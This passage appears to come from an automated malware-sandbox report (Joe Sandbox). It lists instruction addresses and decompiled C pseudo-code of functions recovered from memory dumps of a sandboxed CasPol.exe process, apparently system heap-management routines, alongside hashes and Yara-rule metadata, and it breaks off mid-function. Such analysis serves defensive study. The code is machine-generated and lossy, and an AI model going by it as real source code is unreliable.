                                                                0x00421982
                                                                0x00421989
                                                                0x0042198a
                                                                0x00421990
                                                                0x0042177d
                                                                0x0042177d
                                                                0x00421783
                                                                0x00421789
                                                                0x004217a2
                                                                0x004217a5
                                                                0x004217ab
                                                                0x004217b2
                                                                0x004217b8
                                                                0x004217b9
                                                                0x004217c5
                                                                0x004217c8
                                                                0x004217cf
                                                                0x004217d6
                                                                0x004217dc
                                                                0x004217e9
                                                                0x004217f9
                                                                0x004217fa
                                                                0x004217fb
                                                                0x00421801
                                                                0x00421808
                                                                0x0042180e
                                                                0x00421814
                                                                0x00000000
                                                                0x00421814
                                                                0x00421996
                                                                0x0042199d
                                                                0x0042199d
                                                                0x0042199d
                                                                0x004219a3
                                                                0x004219aa
                                                                0x004219b1
                                                                0x004219b8
                                                                0x004219be
                                                                0x004219c4
                                                                0x004219ca
                                                                0x004219d1
                                                                0x004219d7
                                                                0x004219dd
                                                                0x004219e7
                                                                0x004219ed
                                                                0x004219ed
                                                                0x004219f5
                                                                0x00000000
                                                                0x00000000
                                                                0x004219fb
                                                                0x00421a01
                                                                0x00421a07
                                                                0x00421a0a
                                                                0x00421a10
                                                                0x00421a12
                                                                0x00421a19
                                                                0x00421a1f
                                                                0x00421a25
                                                                0x00421a28
                                                                0x00421a28
                                                                0x00421a2e
                                                                0x00000000
                                                                0x00000000
                                                                0x00421a34
                                                                0x00421a3a
                                                                0x00000000
                                                                0x00000000
                                                                0x00421a40
                                                                0x00421a46
                                                                0x00421a49
                                                                0x00421a50
                                                                0x00421a59
                                                                0x00421a5c
                                                                0x00421a5c
                                                                0x00421a5c
                                                                0x00421a62
                                                                0x00421a68
                                                                0x00421a6e
                                                                0x00421a75
                                                                0x00421a78
                                                                0x00421a7e
                                                                0x00421a85
                                                                0x00421a8b
                                                                0x00421a92
                                                                0x00421a98
                                                                0x00421a9f
                                                                0x00421a9f
                                                                0x00421aa5
                                                                0x00000000
                                                                0x00000000
                                                                0x00421aab
                                                                0x00421ab5
                                                                0x00421abb
                                                                0x00421ac1
                                                                0x00421ac1
                                                                0x00421ac1
                                                                0x00421ac7
                                                                0x00421ac7
                                                                0x00421acd
                                                                0x00421ad3
                                                                0x00000000
                                                                0x00000000
                                                                0x00421ad9
                                                                0x00421adf
                                                                0x00421ae9
                                                                0x00421aef
                                                                0x00421af5
                                                                0x00421afb
                                                                0x00421afc
                                                                0x00421b02
                                                                0x00421b08
                                                                0x00421b0d
                                                                0x00421b13
                                                                0x00421b19
                                                                0x00421b1a
                                                                0x00421b21
                                                                0x00421b28
                                                                0x00421b2a
                                                                0x00421b30
                                                                0x00421b36
                                                                0x00421b37
                                                                0x00421b3e
                                                                0x00421b44
                                                                0x00421b4a
                                                                0x00421b51
                                                                0x00421b57
                                                                0x00421b58
                                                                0x00421b5e

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312223010.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_400000_CasPol.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7909fdd41a2a38d1ffa721a9390ebb33b3e92cd932ef9379a44b01b9e0fff542
                                                                • Instruction ID: ce1c33ea22e8d2704ee47de4978e3ee63d9c84a4eb77c6f2ed1659725bd57dcf
                                                                • Opcode Fuzzy Hash: 7909fdd41a2a38d1ffa721a9390ebb33b3e92cd932ef9379a44b01b9e0fff542
                                                                • Instruction Fuzzy Hash: 37512172508B95CFD712CF38E88AA413FB0F342720B48429EC4B2571E2E778261ADF49
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 01638A0A Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E01638A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x171d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0166B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0163E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1601180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E01651DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E01663C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E01638999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L016477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                0x01638a0a
                                                                0x01638a1c
                                                                0x01638a23
                                                                0x01638a2e
                                                                0x01638a30
                                                                0x01638a36
                                                                0x01638a3c
                                                                0x01638a3e
                                                                0x01638a4a
                                                                0x01638a52
                                                                0x01638a9c
                                                                0x01638aae
                                                                0x01638a58
                                                                0x01638a5e
                                                                0x01638a6a
                                                                0x01638a6f
                                                                0x01638a75
                                                                0x01638a7d
                                                                0x01638a85
                                                                0x01638a86
                                                                0x01638a89
                                                                0x01638a93
                                                                0x01638a99
                                                                0x01638a9b
                                                                0x00000000
                                                                0x01638aaf
                                                                0x01638abe
                                                                0x01638ac3
                                                                0x01638acb
                                                                0x01638ad7
                                                                0x01638ae0
                                                                0x01638af1
                                                                0x00000000
                                                                0x01638af1
                                                                0x01638acd
                                                                0x01638ad5
                                                                0x01638afb
                                                                0x01638afd
                                                                0x01638aff
                                                                0x01638b07
                                                                0x01638b22
                                                                0x01638b24
                                                                0x01638b2a
                                                                0x01638b2e
                                                                0x01638b3f
                                                                0x01638b78
                                                                0x01638b41
                                                                0x01638b52
                                                                0x01638b54
                                                                0x01638b5c
                                                                0x01638b74
                                                                0x01638b74
                                                                0x01638b5c
                                                                0x01638b3f
                                                                0x01638b5e
                                                                0x01638b61
                                                                0x01638b64
                                                                0x01638b64
                                                                0x01638b6c
                                                                0x01638b6c
                                                                0x01638b11
                                                                0x01689cd5
                                                                0x01689cd5
                                                                0x01638b17
                                                                0x01638b1a
                                                                0x01638b1a
                                                                0x00000000
                                                                0x01638ad5
                                                                0x01638a89

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3eb1225f63b861dc0a4bea35305b07c77633d071409ba0f901eaaa9ec7000f5b
                                                                • Instruction ID: c3f4f2993dd8475e48a808b0576bf8582f4d7807780770d3f924173c4e6685e4
                                                                • Opcode Fuzzy Hash: 3eb1225f63b861dc0a4bea35305b07c77633d071409ba0f901eaaa9ec7000f5b
                                                                • Instruction Fuzzy Hash: D04152B1A0022D9BDB24DF59CC88AE9B7F9EB94300F1046E9E91997342D7709E85CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EAA16 Relevance: .1, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016EAA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E016EABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E016EAB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E016EAC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E016CCB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L016477F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E01647D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E016E131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E016CCB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                0x016eaa1f
                                                                0x016eaa21
                                                                0x016eaa23
                                                                0x016eaa2b
                                                                0x016eaa30
                                                                0x016eaa36
                                                                0x016eaa39
                                                                0x016eaa42
                                                                0x016eaa75
                                                                0x016eaa7a
                                                                0x016eaa7c
                                                                0x016eaa7c
                                                                0x016eaa88
                                                                0x016eaa8a
                                                                0x016eaa8f
                                                                0x016eab02
                                                                0x016eab04
                                                                0x016eaa99
                                                                0x016eaaa8
                                                                0x016eaaaf
                                                                0x016eaab3
                                                                0x016eaacc
                                                                0x016eaad1
                                                                0x016eaad6
                                                                0x016eaae0
                                                                0x016eaaf3
                                                                0x016eaaf9
                                                                0x016eaafe
                                                                0x016eaafe
                                                                0x016eaaf3
                                                                0x016eaad6
                                                                0x016eaab3
                                                                0x016eab07
                                                                0x016eab0a
                                                                0x016eab11
                                                                0x016eab23
                                                                0x016eab13
                                                                0x016eab1c
                                                                0x016eab1c
                                                                0x016eab2b
                                                                0x016eab44
                                                                0x016eab44
                                                                0x016eab51
                                                                0x016eab51
                                                                0x016eaa44
                                                                0x016eaa47
                                                                0x016eaa4c
                                                                0x00000000
                                                                0x00000000
                                                                0x016eaa5a
                                                                0x016eaa64
                                                                0x016eaa72
                                                                0x00000000
                                                                0x016eaa66
                                                                0x016eaa66
                                                                0x016eaa68
                                                                0x016eaa6a
                                                                0x00000000
                                                                0x016eaa6a

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                • Instruction ID: d905ec8cbeff43a9b9f6f9923ad8b56791300c0f4e537305ca6917afad5e6813
                                                                • Opcode Fuzzy Hash: 702fa5d1d049179799b5169bcec1b3622bc185bb93763a62bdaaaa196ea10277
                                                                • Instruction Fuzzy Hash: 4131E332B01205ABEF159AA9CD89BBFFBEBEF80610F05456DE905A7391EB748D01C650
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F22AE Relevance: .1, Instructions: 116COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016F22AE(unsigned int* __ecx, intOrPtr __edx, void* __eflags, signed int _a4, signed int _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t50;
				signed int _t53;
				signed char _t63;
				signed char _t71;
				signed char _t75;
				signed int _t77;
				unsigned int _t106;
				unsigned int* _t114;
				signed int _t117;

				_v20 = _v20 & 0x00000000;
				_t117 = _a4;
				_t114 = __ecx;
				_v24 = __edx;
				E016F21E8(_t117, __edx,  &_v16,  &_v12);
				if(_v24 != 0 && (_v12 | _v8) != 0) {
					_t71 =  !_v8;
					_v16 =  !_v12 >> 8 >> 8;
					_t72 = _t71 >> 8;
					_t50 = _v16;
					_t20 = (_t50 >> 8) + 0x160ac00; // 0x6070708
					_t75 = ( *((intOrPtr*)((_t71 >> 8 >> 8 >> 8) + 0x160ac00)) +  *((intOrPtr*)((_t71 >> 0x00000008 >> 0x00000008 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x160ac00)) & 0x000000ff) + ( *_t20 +  *((intOrPtr*)((_t50 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t71 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t72 & 0x000000ff) + 0x160ac00)) & 0x000000ff);
					_v16 = _t75;
					if(( *(__ecx + 0x38) & 0x00000002) != 0) {
						L6:
						_t53 =  *0x1716110; // 0x3951a168
						 *_t117 = ( !_t53 ^  *_t117 ^ _t117) & 0x7fffffff ^  !_t53 ^ _t117;
						 *(_t117 + 4) = (_t117 - _v24 >> 0x0000000c ^  *0x1716110 ^ _t117) & 0x000000ff | 0x00000200;
						_t77 = _a8 & 0x00000001;
						if(_t77 == 0) {
							E0163FFB0(_t77, _t114, _t114);
						}
						_t63 = E016F2FBD(_t114, _v24, _v12, _v8, _v16, 0);
						_v36 = 1;
						if(_t77 == 0) {
							E01642280(_t63, _t114);
						}
						 *(_t117 + 4) =  *(_t117 + 4) & 0xfffffdff;
						 *_a12 = 0xff;
					} else {
						_t106 =  *(__ecx + 0x18) >> 7;
						if(_t106 <= 8) {
							_t106 = 8;
						}
						if( *((intOrPtr*)(_t114 + 0x1c)) + _t75 > _t106) {
							goto L6;
						}
					}
				}
				return _v20;
			}




















                                                                0x016f22b9
                                                                0x016f22c2
                                                                0x016f22c6
                                                                0x016f22c8
                                                                0x016f22d8
                                                                0x016f22e2
                                                                0x016f2303
                                                                0x016f2314
                                                                0x016f2321
                                                                0x016f234a
                                                                0x016f235b
                                                                0x016f236c
                                                                0x016f2372
                                                                0x016f2376
                                                                0x016f238f
                                                                0x016f238f
                                                                0x016f23b4
                                                                0x016f23c6
                                                                0x016f23c9
                                                                0x016f23cc
                                                                0x016f23cf
                                                                0x016f23cf
                                                                0x016f23e9
                                                                0x016f23ee
                                                                0x016f23f8
                                                                0x016f23fb
                                                                0x016f23fb
                                                                0x016f2403
                                                                0x016f240a
                                                                0x016f2378
                                                                0x016f237b
                                                                0x016f2381
                                                                0x016f2385
                                                                0x016f2385
                                                                0x016f238d
                                                                0x00000000
                                                                0x00000000
                                                                0x016f238d
                                                                0x016f2376
                                                                0x016f2417

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 694893955c51dd5039ad3e7fb10ef3992302fa5fb4795e70ddde11547ca84d60
                                                                • Instruction ID: 2c4f900498172cc6f0e010beebe59d831b6538da878b8ca31266efca68b96f8c
                                                                • Opcode Fuzzy Hash: 694893955c51dd5039ad3e7fb10ef3992302fa5fb4795e70ddde11547ca84d60
                                                                • Instruction Fuzzy Hash: 0441E3B12183424BD305CF69CCA5A7BBBE1EF95225F06465DF5D58B382CB34D809CBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016EFDE2 Relevance: .1, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 76%
                                                                			E016EFDE2(signed int* __ecx, signed int __edx, signed int _a4) {
				char _v8;
				signed int _v12;
				signed int _t29;
				char* _t32;
				char* _t43;
				signed int _t80;
				signed int* _t84;

				_push(__ecx);
				_push(__ecx);
				_t56 = __edx;
				_t84 = __ecx;
				_t80 = E016EFD4E(__ecx, __edx);
				_v12 = _t80;
				if(_t80 != 0) {
					_t29 =  *__ecx & _t80;
					_t74 = (_t80 - _t29 >> 4 << __ecx[1]) + _t29;
					if(__edx <= (_t80 - _t29 >> 4 << __ecx[1]) + _t29) {
						E016F0A13(__ecx, _t80, 0, _a4);
						_t80 = 1;
						if(E01647D50() == 0) {
							_t32 = 0x7ffe0380;
						} else {
							_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
							_push(3);
							L21:
							E016E1608( *((intOrPtr*)(_t84 + 0x3c)), _t56);
						}
						goto L22;
					}
					if(( *(_t80 + 0xc) & 0x0000000c) != 8) {
						_t80 = E016F2B28(__ecx[0xc], _t74, __edx, _a4,  &_v8);
						if(_t80 != 0) {
							_t66 =  *((intOrPtr*)(_t84 + 0x2c));
							_t77 = _v8;
							if(_v8 <=  *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x2c)) + 0x28)) - 8) {
								E016EC8F7(_t66, _t77, 0);
							}
						}
					} else {
						_t80 = E016EDBD2(__ecx[0xb], _t74, __edx, _a4);
					}
					if(E01647D50() == 0) {
						_t43 = 0x7ffe0380;
					} else {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t43 == 0 || ( *( *[fs:0x30] + 0x240) & 0x00000001) == 0 || _t80 == 0) {
						goto L22;
					} else {
						_push((0 | ( *(_v12 + 0xc) & 0x0000000c) != 0x00000008) + 2);
						goto L21;
					}
				} else {
					_push(__ecx);
					_push(_t80);
					E016EA80D(__ecx[0xf], 9, __edx, _t80);
					L22:
					return _t80;
				}
			}










                                                                0x016efde7
                                                                0x016efde8
                                                                0x016efdec
                                                                0x016efdee
                                                                0x016efdf5
                                                                0x016efdf7
                                                                0x016efdfc
                                                                0x016efe19
                                                                0x016efe22
                                                                0x016efe26
                                                                0x016efec6
                                                                0x016efecd
                                                                0x016efed5
                                                                0x016efee7
                                                                0x016efed7
                                                                0x016efee0
                                                                0x016efee0
                                                                0x016efeef
                                                                0x016eff00
                                                                0x016eff02
                                                                0x016eff07
                                                                0x016eff07
                                                                0x00000000
                                                                0x016efeef
                                                                0x016efe33
                                                                0x016efe55
                                                                0x016efe59
                                                                0x016efe5b
                                                                0x016efe5e
                                                                0x016efe69
                                                                0x016efe6d
                                                                0x016efe6d
                                                                0x016efe69
                                                                0x016efe35
                                                                0x016efe41
                                                                0x016efe41
                                                                0x016efe79
                                                                0x016efe8b
                                                                0x016efe7b
                                                                0x016efe84
                                                                0x016efe84
                                                                0x016efe93
                                                                0x00000000
                                                                0x016efea8
                                                                0x016efeba
                                                                0x00000000
                                                                0x016efeba
                                                                0x016efdfe
                                                                0x016efe01
                                                                0x016efe02
                                                                0x016efe08
                                                                0x016eff0c
                                                                0x016eff14
                                                                0x016eff14

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                • Instruction ID: f27ecb40c104a5a577336a865870d509ffc6aa67bf1cf3a5cfc5d4798ec9a4d1
                                                                • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                                                • Instruction Fuzzy Hash: AD31F8322016416FD7229B6CCC4CF6A7BEAEBC5650F184698E5458B382DBB4EC41C754
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F20A8 Relevance: .1, Instructions: 114COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 94%
                                                                			E016F20A8(intOrPtr __ecx, intOrPtr __edx, signed int _a4, signed int* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _t35;
				signed int _t57;
				unsigned int _t61;
				signed int _t63;
				signed int _t64;
				signed int _t73;
				signed int _t77;
				signed int _t80;
				signed int _t83;
				signed int _t84;
				unsigned int _t92;
				unsigned int _t97;
				signed int _t100;
				unsigned int _t102;

				_t79 = __edx;
				_t35 =  *0x1716110; // 0x3951a168
				_t57 = _a4;
				_v8 = __ecx;
				_t84 =  *_t57;
				_v12 = __edx;
				_t61 = _t84 ^ _t35 ^ _t57;
				_t83 = _t61 >> 0x00000001 & 0x00007fff;
				_v20 = _t83;
				 *_t57 = (_t84 ^ _t35 ^ _t57) & 0x7fffffff ^ _t35 ^ _t57;
				_t63 = _t61 >> 0x00000010 & 0x00007fff;
				if(_t63 != 0) {
					_t100 =  *0x1716110; // 0x3951a168
					_t77 = _t57 - (_t63 << 3);
					_v16 = _t77;
					_t102 = _t100 ^ _t77 ^  *_t77;
					_t106 = _t102;
					if(_t102 >= 0) {
						E016F2E3F(_v8, __edx, _t106, _t77);
						_t57 = _v16;
						_t79 = _v12;
						_t83 = _t83 + (_t102 >> 0x00000001 & 0x00007fff);
					}
				}
				_t64 = _t57 + _t83 * 8;
				if(_t64 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
					asm("lfence");
					_t97 =  *_t64 ^  *0x1716110 ^ _t64;
					_t109 = _t97;
					if(_t97 >= 0) {
						E016F2E3F(_v8, _t79, _t109, _t64);
						_t79 = _v12;
						_t83 = _t83 + (_t97 >> 0x00000001 & 0x00007fff);
					}
				}
				if(( *(_v8 + 0x38) & 0x00000001) != 0) {
					_t73 = _t57 + _t83 * 8;
					if(_t73 < _t79 + (( *(_t79 + 0x14) & 0x0000ffff) + 3) * 8) {
						asm("lfence");
						_t92 =  *_t73 ^  *0x1716110 ^ _t73;
						_t113 = _t92;
						if(_t92 >= 0) {
							E016F2E3F(_v8, _t79, _t113, _t73);
							_t83 = _t83 + (_t92 >> 0x00000001 & 0x00007fff);
						}
					}
				}
				if(_v20 != _t83) {
					_t66 = _v12;
					_t80 = _t57 + _t83 * 8;
					 *_t57 =  *_t57 ^ (_t83 + _t83 ^  *_t57 ^  *0x1716110 ^ _t57) & 0x0000fffe;
					if(_t80 < _v12 + (( *(_t66 + 0x14) & 0x0000ffff) + 3) * 8) {
						 *_t80 =  *_t80 ^ (_t83 << 0x00000010 ^  *_t80 ^  *0x1716110 ^ _t80) & 0x7fff0000;
					}
				}
				 *_a8 = _t83;
				return _t57;
			}





















                                                                0x016f20a8
                                                                0x016f20b0
                                                                0x016f20b6
                                                                0x016f20ba
                                                                0x016f20be
                                                                0x016f20c4
                                                                0x016f20cb
                                                                0x016f20db
                                                                0x016f20e4
                                                                0x016f20e7
                                                                0x016f20e9
                                                                0x016f20ef
                                                                0x016f20f1
                                                                0x016f20fe
                                                                0x016f2102
                                                                0x016f2105
                                                                0x016f2105
                                                                0x016f2107
                                                                0x016f210d
                                                                0x016f2112
                                                                0x016f2115
                                                                0x016f2120
                                                                0x016f2120
                                                                0x016f2107
                                                                0x016f2126
                                                                0x016f2131
                                                                0x016f2133
                                                                0x016f213e
                                                                0x016f213e
                                                                0x016f2140
                                                                0x016f2146
                                                                0x016f214b
                                                                0x016f2156
                                                                0x016f2156
                                                                0x016f2140
                                                                0x016f215f
                                                                0x016f2165
                                                                0x016f2170
                                                                0x016f2172
                                                                0x016f217d
                                                                0x016f217d
                                                                0x016f217f
                                                                0x016f2185
                                                                0x016f2192
                                                                0x016f2192
                                                                0x016f217f
                                                                0x016f2170
                                                                0x016f2197
                                                                0x016f2199
                                                                0x016f21a1
                                                                0x016f21b1
                                                                0x016f21bf
                                                                0x016f21d6
                                                                0x016f21d6
                                                                0x016f21bf
                                                                0x016f21dd
                                                                0x016f21e5

                                                                Memory Dump Source
                                                                • Source File: 00000001.00000002.312556602.0000000001600000.00000040.00001000.00020000.00000000.sdmp, Offset: 01600000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_1_2_1600000_CasPol.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f442d83b926a5808712c273f19560dc9fb05f8e94702292cabcb81b77a91a82f
                                                                • Instruction ID: e37173efca9a557616963e1d50ee87fd650c74c7071581fc56fb43efad42e47d
                                                                • Opcode Fuzzy Hash: f442d83b926a5808712c273f19560dc9fb05f8e94702292cabcb81b77a91a82f
                                                                • Instruction Fuzzy Hash: C1410373E0002A8BCB18CF68C8A147AF7F2FF4830575642BDDA05AB295DB34AD41CB94
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 016F2D07 Relevance: .1, Instructions: 112COMMONCrypto
                                                                Download Yara Rule
                                                                C-Code - Quality: 100%
                                                                			E016F2D07(void* __ecx, void* __edx, void* __eflags, signed short _a4) {
				char _v5;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				signed int _t34;
				signed char _t40;
				signed int* _t49;
				signed int _t55;
				signed char _t57;
				signed char _t58;
				signed char _t59;
				signed short _t60;
				unsigned int _t66;
				unsigned int _t71;
				signed int _t77;
				signed char _t83;
				signed char _t84;
				signed int _t91;
				signed int _t93;
				signed int _t96;

				_t34 = E016F21E8(_a4, __edx,  &_v24,  &_v20);
				_t83 =  !_v20;
				_t57 =  !_v16;
				_t84 = _t83 >> 8;
				_v12 = _t84 >> 8;
				_v5 =  *((intOrPtr*)((_t83 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t84 & 0x000000ff) + 0x160ac00));
				_t58 = _t57 >> 8;
				_t59 = _t58 >> 8;
				_t66 = _t59 >> 8;
				_t60 = _a4;
				_t13 = _t66 + 0x160ac00; // 0x6070708
				_t40 = _v12;
				_t71 = _t40 >> 8;
				_v12 = 0;
				_t17 = _t71 + 0x160ac00; // 0x6070708
				 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + ( *_t13 +  *((intOrPtr*)((_t59 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t57 & 0x000000ff) + 0x160ac00)) +  *((intOrPtr*)((_t58 & 0x000000ff) + 0x160ac00)) & 0x000000ff) + ( *_t17 +  *((intOrPtr*)((_t40 & 0x000000ff) + 0x160ac00)) + _v5 & 0x000000ff);
				 *_t60 =  *_t60 ^ ( *_t60 ^  *0x1716110 ^ _t34 ^ _t60) & 0x00000001;
				_t49 = __ecx + 8;
				_t77 =  *_t60 & 0x0000ffff ^ _t60 & 0x0000ffff ^  *0x1716110 & 0x0000ffff;
				_t91 =  *_t49;
				_t96 = _t49[1] & 1;
				_v24 = _t49;
				if(_t91 != 0) {
					_t93 = _t77;
					L2:
					while(1) {
						if(_t93 < (_t91 - 0x00000004 & 0x0000ffff ^  *(_t91 - 4) & 0x0000ffff ^  *0x1716110 & 0x0000ffff)) {
							_t55 =  *_t91;
							if(_t96 == 0) {
								L11:
								if(_t55 == 0) {
									goto L13;
								} else {
									goto L12;
								}
							} else {
								if(_t55 == 0) {
									L13:
									_v12 = 0;
								} else {
									_t55 = _t55 ^ _t91;
									goto L11;
								}
							}
						} else {
							_t55 =  *(_t91 + 4);
							if(_t96 == 0) {
								L6:
								if(_t55 != 0) {
									L12:
									_t91 = _t55;
									continue;
								} else {
									goto L7;
								}
							} else {
								if(_t55 == 0) {
									L7:
									_v12 = 1;
								} else {
									_t55 = _t55 ^ _t91;
